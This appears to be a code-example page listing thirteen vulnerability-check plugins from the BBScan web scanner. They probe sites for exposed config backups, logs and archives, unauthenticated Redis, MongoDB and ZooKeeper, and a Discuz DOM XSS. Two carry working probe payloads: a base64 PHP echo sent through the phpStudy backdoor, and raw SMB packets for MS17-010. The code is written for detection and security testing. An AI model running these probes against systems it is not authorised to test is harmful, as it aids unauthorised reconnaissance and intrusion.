Esempi in Python per save_script_result

Esempio n. 1

def do_check(self, url):
    if not self.conn_pool:
        return
    extensions = [
        '.zip', '.rar', '.tar.gz', '.tar.bz2', '.tgz', '.7z', '.log', '.sql'
    ]

    if url == '/' and self.domain_sub:
        file_names = [self.host.split(':')[0], self.domain_sub]
        for name in file_names:
            for ext in extensions:
                status, headers, html_doc = self.http_request('/' + name + ext)
                if status == 206 and \
                        (self._404_status == 404 or headers.get('content-type', '').find('application/') >= 0) or \
                        (ext == '.sql' and html_doc.find("CREATE TABLE") >= 0):
                    save_script_result(self, status,
                                       self.base_url + '/' + name + ext, '',
                                       'Compressed File')

    elif url != '/':
        # sub folders like /aaa/bbb/
        folder_name = url.split('/')[-2]
        if len(folder_name) >= 4:
            url_prefix = url[:-len(folder_name) - 1]
            for ext in extensions:
                status, headers, html_doc = self.http_request(url_prefix +
                                                              folder_name +
                                                              ext)
                if status == 206 and headers.get('content-type',
                                                 '').find('application/') >= 0:
                    save_script_result(
                        self, status,
                        self.base_url + url_prefix + folder_name + ext, '',
                        'Compressed File')

Esempio n. 2

File: discuz_backup_file.py Progetto: sry309/BBScan

def do_check(self, url):
    if url == '/' and self.conn_pool:
        if self.index_status == 301 and self.index_headers.get('location', '').find('forum.php') >= 0 or \
                str(self.index_headers).find('_saltkey=') > 0:

            url_lst = [
                '/config/config_ucenter.php.bak',
                '/config/.config_ucenter.php.swp',
                '/config/.config_global.php.swp',
                '/config/config_global.php.1',
                '/uc_server/data/config.inc.php.bak',
                '/config/config_global.php.bak', '/include/config.inc.php.tmp'
            ]

            for _url in url_lst:
                status, headers, html_doc = self.http_request(_url)
                if status == 200 or status == 206:
                    if html_doc.find('<?php') >= 0:
                        save_script_result(self, status, self.base_url + _url,
                                           'Discuz Backup File Found')

            # getcolor DOM XSS
            status, headers, html_doc = self.http_request(
                '/static/image/admincp/getcolor.htm')
            if html_doc.find("if(fun) eval('parent.'+fun+'") > 0:
                save_script_result(
                    self, status,
                    self.base_url + '/static/image/admincp/getcolor.htm', '',
                    'Discuz getcolor DOM XSS')

Esempio n. 3

def do_check(self, url):
    if url == '/':
        if self.conn_pool and self.index_status in (301, 302):
            for keyword in ['admin', 'login', 'manage', 'backend']:
                if self.index_headers.get('location', '').find(keyword) >= 0:
                    save_script_result(self, self.index_status,
                                       self.base_url + '/', 'Admin Site')
                    break

Esempio n. 4

File: phpstudy_backdoor.py Progetto: sry309/BBScan

def do_check(self, url):
    if url == '/':
        # echo "456F5628-59FC-01C8-08BE-5CBCD4114DC3";
        poc = {
            "Accept-Charset": "ZWNobyAiNDU2RjU2MjgtNTlGQy0wMUM4LTA4QkUtNUNCQ0Q0MTE0REMzIjs=",
            "Accept-Encoding": "gzip,deflate"
        }
        status, headers, pocRequest = self.http_request('', headers=poc)
        if "456F5628-59FC-01C8-08BE-5CBCD4114DC3" in pocRequest:
            save_script_result(self, status, self.base_url, 'phpstudy back door')

Esempio n. 5

File: wordpress_backup_file.py Progetto: binarytrails/bbscan

def do_check(self, url):
    if url == '/' and self.conn_pool:
        if self.index_html_doc.find('/wp-content/themes/') >= 0:
            url_lst = [
                '/wp-config.php.inc', '/wp-config.inc', '/wp-config.bak',
                '/wp-config.php~', '/.wp-config.php.swp', '/wp-config.php.bak'
            ]
            for _url in url_lst:
                status, headers, html_doc = self.http_request(_url)
                if status == 200 or status == 206:
                    if html_doc.find('<?php') >= 0:
                        save_script_result(self, status, self.base_url + _url,
                                           '', 'WordPress Backup File Found')

Esempio n. 6

File: outlook_web_app.py Progetto: binarytrails/bbscan

def do_check(self, url):
    if url == '/' and self.conn_pool:
        if self.index_status == 302 and self.index_headers.get(
                'location', '').lower() == 'https://%s/owa' % self.host:
            save_script_result(self, 302, 'https://%s' % self.host,
                               'OutLook Web APP Found')
            return

        status, headers, html_doc = self.http_request('/ews/')

        if status == 302:
            redirect_url = headers.get('location', '')
            if redirect_url == 'https://%shttp://%s/ews/' % (self.host,
                                                             self.host):
                save_script_result(self, 302, 'https://%s' % self.host,
                                   'OutLook Web APP Found')
                return
            if redirect_url == 'https://%s/ews/' % self.host:
                try:
                    conn = httplib.HTTPSConnection(self.host)
                    conn.request('HEAD', '/ews')
                    if conn.getresponse().status == 401:
                        save_script_result(self, 401, redirect_url,
                                           'OutLook Web APP Found')
                    conn.close()
                except Exception as e:
                    pass
                return

        elif status == 401:
            if headers.get('Server', '').find('Microsoft-IIS') >= 0:
                save_script_result(self, 401, self.base_url + '/ews/',
                                   'OutLook Web APP Found')
                return

Esempio n. 7

def do_check(self, url):
    if url != '/':
        return
    port = 27017
    if self.scheme == 'mongodb' and self.port != 27017:    # 非标准端口
        port = self.port
    elif 27017 not in self.ports_open:
        return
    try:
        conn = pymongo.MongoClient(host=self.host, port=port, connectTimeoutMS=5000, socketTimeoutMS=5000)
        database_list = conn.database_names()
        if not database_list:
            conn.close()
            return
        detail = "%s MongoDB Unauthorized Access : %s" % (self.host, ",".join(database_list))
        conn.close()
        save_script_result(self, '', 'mongodb://%s:%s' % (self.host, port), detail)
    except Exception as e:
        pass

Esempio n. 8

File: kong_admin_rest_api.py Progetto: binarytrails/bbscan

def do_check(self, url):
    if url != '/':
        return

    if self.conn_pool and self.index_headers.get('Server',
                                                 '').startswith('kong/'):
        save_script_result(self, '200', self.base_url, 'Kong Admin Rest API')

    if self.port == 8001:  # 如果已经维护了 8001 端口的 HTTP连接池，上面的逻辑已经完成扫描
        return

    if 8001 not in self.ports_open:  # 如果8001端口不开放
        return

    # 如果输入的是一个非标准端口的HTTP服务
    # 那么，需要单独对8001端口进行检测

    resp = requests.get('http://%s:8001/' % self.host)
    headers = resp.headers
    if headers.get('Server', '').startswith('kong/'):
        save_script_result(self, resp.status_code,
                           'http://%s:8001' % self.host, 'Kong Admin Rest API')

Esempio n. 9

File: sensitive_folders.py Progetto: binarytrails/bbscan

def do_check(self, url):
    if url != '/' or not self.conn_pool or self._404_status == 301:
        return

    _folders = folders.split()

    for _url in _folders:
        if not _url:
            continue
        status, headers, html_doc = self.http_request(_url)

        if status in (301, 302):
            location = headers.get('location', '')
            if location.startswith(self.base_url + _url + '/') or location.startswith(_url + '/'):
                # save_user_script_result(self, status, self.base_url + _url,
                #                         '', 'Possible Sensitive Folder Found')
                self.enqueue(_url + '/')
                self.crawl(_url + '/')

        if status == 206 and self._404_status != 206:
            save_script_result(self, status, self.base_url + _url,
                               '', 'Possible Sensitive File Found')

Esempio n. 10

File: zookeeper_unauth.py Progetto: sry309/BBScan

def do_check(self, url):
    if url != '/':
        return
    port = 2181
    if self.scheme == '	zookeeper' and self.port != 2181:  # 非标准端口
        port = self.port
    elif 2181 not in self.ports_open:
        return

    try:
        socket.setdefaulttimeout(5)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((self.host, port))
        s.send('envi')
        data = s.recv(1024)
        if 'Environment' in data:
            save_script_result(self, '',
                               'zookeeper://%s:%s' % (self.host, port), '',
                               'Zookeeper Unauthorized Access')
    except Exception as e:
        pass
    finally:
        s.close()

Esempio n. 11

def do_check(self, url):
    if url != '/':
        return
    port = 16379
    # 非标准端口，不需要检查6379端口是否开放
    # 支持用户传入目标 redis://test.ip:16379 来扫描非标准端口上的Redis服务
    if self.scheme == 'redis' and self.port != 6379:
        port = self.port
    elif 6379 not in self.ports_open:
        return
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(3)
    try:
        host = self.host.split(':')[0]
        s.connect((host, port))
        payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
        s.send(payload)
        data = s.recv(1024)
        s.close()
        if "redis_version" in data:
            save_script_result(self, '', 'redis://%s:%s' % (host, port),
                               'Redis Unauthorized Access')
    except Exception as e:
        s.close()

Esempio n. 12

File: log_files.py Progetto: binarytrails/bbscan

def do_check(self, url):
    if url == '/' and self.conn_pool:
        folders = ['']
        for log_folder in [
                'log', 'logs', '_log', '_logs', 'accesslog', 'errorlog'
        ]:
            status, headers, html_doc = self.http_request('/' + log_folder)

            if status in (301, 302):
                location = headers.get('location', '')
                if location.startswith(self.base_url + '/' + log_folder + '/') or \
                        location.startswith('/' + log_folder + '/'):
                    folders.append(log_folder)
                    self.enqueue(log_folder)
                    self.crawl('/' + log_folder + '/')

            if status == 206 and self._404_status != 206:
                save_script_result(self, status,
                                   self.base_url + '/' + log_folder, '',
                                   'Log File Found')

        url_lst = [
            'access.log', 'www.log', 'error.log', 'log.log', 'sql.log',
            'errors.log', 'debug.log', 'db.log', 'install.log', 'server.log',
            'sqlnet.log', 'WS_FTP.log', 'database.log', 'data.log', 'app.log',
            'log.tar.gz', 'log.rar', 'log.zip', 'log.tgz', 'log.tar.bz2',
            'log.7z'
        ]

        for log_folder in folders:
            for _url in url_lst:
                url_prefix = '/' + log_folder if log_folder else ''
                status, headers, html_doc = self.http_request(url_prefix +
                                                              '/' + _url)
                # print '/' + log_folder + '/' + _url
                if status == 206 and \
                        (self._404_status == 404 or headers.get('content-type', '').find('application/') >= 0):
                    save_script_result(self, status,
                                       self.base_url + url_prefix + '/' + _url,
                                       '', 'Log File')

        for log_folder in folders:
            for _url in ['log.txt', 'logs.txt']:
                url_prefix = '/' + log_folder if log_folder else ''
                status, headers, html_doc = self.http_request(url_prefix +
                                                              '/' + _url)
                # print '/' + log_folder + '/' + _url
                if status == 206 and headers.get('content-type',
                                                 '').find('text/plain') >= 0:
                    save_script_result(self, status,
                                       self.base_url + url_prefix + '/' + _url,
                                       '', 'Log File')

Esempio n. 13

File: smb_ms17010.py Progetto: binarytrails/bbscan

def do_check(self, url):
    if url != '/' or 445 not in self.ports_open:
        return

    ip = self.host.split(':')[0]
    port = 445

    timeout = 5
    negotiate_protocol_request = binascii.unhexlify(
        "00000054ff534d4272000000001801280000000000000000000000000000729c0000c4e1003100024c414e4d414e312e3000024c4d312"
        "e325830303200024e54204c414e4d414e20312e3000024e54204c4d20302e313200")
    session_setup_request = binascii.unhexlify(
        "0000008fff534d4273000000001801280000000000000000000000000000729c0000c4e10cff000000dfff02000100000000003100000"
        "00000d400008054004e544c4d5353500001000000050208a2010001002000000010001000210000002e3431426c7441314e5059746249"
        "55473057696e646f7773203230303020323139350057696e646f7773203230303020352e3000"
    )
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        s.connect((ip, port))
        s.send(negotiate_protocol_request)
        s.recv(1024)
        s.send(session_setup_request)
        data = s.recv(1024)
        user_id = data[32:34]
        session_setup_request_2 = binascii.unhexlify(
            "00000150ff534d4273000000001801280000000000000000000000000000729c"
            + binascii.hexlify(user_id) +
            "c4e10cff000000dfff0200010000000000f200000000005cd0008015014e544c4d535350000300000018001800"
            "40000000780078005800000002000200d000000000000000d200000020002000d200000000000000f200000005"
            "0208a2ec893eacfc70bba9afefe94ef78908d37597e0202fd6177c0dfa65ed233b731faf86b02110137dc50101"
            "000000000000004724eed7b8d2017597e0202fd6177c0000000002000a0056004b002d005000430001000a0056"
            "004b002d005000430004000a0056004b002d005000430003000a0056004b002d00500043000700080036494bf1"
            "d7b8d20100000000000000002e003400310042006c007400410031004e00500059007400620049005500470030"
            "0057696e646f7773203230303020323139350057696e646f7773203230303020352e3000"
        )
        s.send(session_setup_request_2)
        s.recv(1024)
        session_setup_request_3 = binascii.unhexlify(
            "00000063ff534d4273000000001801200000000000000000000000000000729c0000c4e10dff000000dfff0200010000000000000"
            "0000000000000400000002600002e0057696e646f7773203230303020323139350057696e646f7773203230303020352e3000"
        )
        s.send(session_setup_request_3)
        data = s.recv(1024)
        tree_id = data[32:34]
        smb = get_tree_connect_request(ip, tree_id)
        s.send(smb)
        s.recv(1024)
        poc = binascii.unhexlify(
            "0000004aff534d422500000000180128000000000000000000000000" +
            binascii.hexlify(user_id) + "729c" + binascii.hexlify(tree_id) +
            "c4e11000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00"
        )
        s.send(poc)
        data = s.recv(1024)
        s.close()
        if "\x05\x02\x00\xc0" in data:
            save_script_result(self, '', ip + ':445', '',
                               'MS17010 SMB Remote Code Execution')
    except Exception as e:
        return False